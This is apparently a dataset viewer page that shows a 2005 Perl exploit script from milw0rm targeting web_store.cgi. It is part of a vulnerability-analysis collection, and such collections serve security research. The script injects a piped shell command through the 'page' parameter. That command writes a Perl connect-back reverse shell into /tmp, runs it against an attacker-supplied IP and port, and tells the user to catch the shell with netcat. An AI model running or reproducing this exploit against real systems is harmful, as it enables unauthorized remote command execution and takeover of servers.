Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1048.txt74 linesDownload Raw Back to exploits
1#!/usr/bin/perl -w

2#

3#********************************************************************************************

4#               Remote Command Execution Vulnerability In Web_store.cgi                     *

5#                                                                                           *

6#                              [SegmentationFault Group]                                    *

7#                                                                                           *

8#                                                                                           *

9#             Greetz to  :  Xsupr3mo -  failed   - Status-x -  Stealh - P3S4D3L0            *

10#             Greetz to  :  berhooz  -   nima  - ehsan   - Unknown  OutLaw  eutanasia       *

11#                                      www.ashiyane.com                                     *

12#                                                                                           *

13#********************************************************************************************

14#ok setp by setp to work :                      *                                           *

15#[*] start exploit                              *   If connect back shell not found: maybe :*

16#[*] run in your system: nc -l -vv -p 2975      *   you do not have perm to write in /tmp   *

17#[*] starting connect back on 127.0.0.1 :2975   *            Shell not vulnerable           *

18#[*] DONE!                                      *   test and put in /$path/hints.pl?|cd /tmp*

19#[*] Look netcat windows                        *     other path that u know dont have perm *

20#                                               *                                           *

21#********************************************************************************************

22#############################################################################################

23use IO::Socket;

24

25print "*****************************************************************\n";

26print "\tRemote Command Execution Vulnerability in web_store.cgi\n  ";

27print "\t\t-=[  SegmentationFault Group  ]=-\n";      

28print "\t\tcode writen    by sun-os [ActionSpider]\n\n";  

29print "\tGerttz to : Xsupr3mo -  failed   - Status-x -  Stealh";

30print "\n\tand : Behrooz - nima - ehsan www.ashiyane.com\n";

31print "*****************************************************************\n\n";

32

33

34print "enter hostname or ip : \n";

35chomp($server=<STDIN>);

36

37print "port: (default: 80)\n";

38chomp($port=<STDIN>);

39$port=80 if ($port =~/\D/ );

40$port=80 if ($port eq "" );

41

42print "path: (???/web_store.cgi?)\n";

43chomp($path=<STDIN>);

44

45print "your ip (for reverse connect): \n";

46chomp($ip=<STDIN>);

47

48print "your port (for reverse connect): \n";

49chomp($reverse=<STDIN>);

50

51print "ok Remote Command Execution now Start";

52print "|+| try to exploiting...\n";

53

54$string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>dc.pl;perl dc.pl $ip $reverse|";

55

56print "|+| OK! \n";

57print "|+| NOW, run in your system: nc -l -vv -p $reverse\n";

58print "|+| starting connect back on $ip :$reverse\n";

59print "|+| DONE!\n";

60print "|+| Look netcat windows\n\n";

61$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp)

62or die;

63

64print $socket "POST $path HTTP/1.1\n";

65print $socket "Host: $server\n";

66print $socket "Accept: */*\n";

67print $socket "User-Agent: blackbox\n";

68print $socket "Pragma: no-cache\n";

69print $socket "Cache-Control: no-cache\n";

70print $socket "Connection: close\n\n";

71

72print "have nice shell...";

73

74# milw0rm.com [2005-06-15]